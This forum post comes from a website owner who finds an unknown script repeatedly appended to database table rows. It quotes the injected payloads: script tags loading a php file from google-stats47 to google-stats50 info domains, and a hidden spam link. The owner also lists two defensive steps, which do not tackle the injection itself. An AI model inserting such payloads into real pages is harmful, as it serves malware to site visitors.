I saw last week that an unknown script was aapended to one or more columns of every row in some sertain tables. I removed that script but it re-appeared once again. The script looks something like this (PLEASE DO NOT CLICK ON THIS LINK....I DON'T KNOW WHAT IT WILL DO)</title><script src="http://google-stats50 . info /ur. php>".
When the script reappeared, it may appear with different link (PLEASE DO NOT CLICK ON LINKS BELOW)
1) </title><script src="http:// google-stats49 . info /ur. php>"
2) </title><script src="http:// google-stats48 . info /ur. php>"
3) </title><script src="http:// google-stats47 . info /ur. php>"
4) </title><a style=display:none; href=http:// worid - of - books . com >book</a>
To prevent these scripts to re-appear, I took the following steps:
a) Encrypting the sensitive information in the Web.config file
b) Making the IFRAME element secure by applying the attribute security="restricted"
View Complete Post